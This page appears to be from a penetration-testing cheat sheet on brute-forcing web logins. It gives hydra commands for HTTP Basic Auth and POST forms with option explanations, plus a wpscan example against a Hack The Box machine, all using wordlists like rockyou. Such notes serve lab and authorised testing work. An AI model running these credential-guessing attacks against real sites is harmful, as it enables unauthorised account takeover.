Brute Forcing Web Forms

Usually used to attack a login form

HTTP Basic Auth

Bruteforce HTTP Basic Auth 

hydra -L users.lst -P passwords.txt -f www.site.org http-head /path/of/target/ -V

Flags:

  • -V: verbose mode

  • -f: exit after the first login pair is found

HTTP POST

Bruteforcing HTTP POST form: 

hydra http-form-post "login_path:form_username_name=^USER^&form_password_name=^PASS^:failed_login_text" -l username -P passwords_wordlist.txt -t 10

Options:

  • login_path: The URL of the login form, e.g /login.php.

  • form_username_name: The "name" variable of the username input field of the form.

  • form_password_name: The "name" variable of the password input field of the form.

  • failed_login_text: Text which indicates to Hydra that the login failed, for example "Invalid Credentials."

  • username: The username of the user you want to brute force.

Flags:

  • -t: The number of threads.

  • -l: Specifies the username of the user to brute force.

  • -L: Specifies a wordlist of usernames to brute force.

  • -P: Specifies a wordlist of passwords to brute force.

Example use where a failed login redirected to a page with a ?error=1 GET parameter: 

hydra 192.168.101.10 http-form-post "/index.php?module=Users&action=Login:__vtrftk=sid%3A9db267cda06a381fdff01c51a36d2362551c82c2%2C1527426288&username=^USER^&password=^PASS^:error=1" -P /usr/share/wordlists/rockyou.txt -t 64 -l admin

WordPress login

Brute forcing WordPress logins using WPScan:

wpscan --url https://brainfuck.htb --passwords /home/x90slide/resources/SecLists/Passwords/Leaked-Databases/rockyou.txt --usernames admin,orestis --disable-tls-checks
PreviousJWT AttacksNextLoose Comparisons

Last updated

Was this helpful?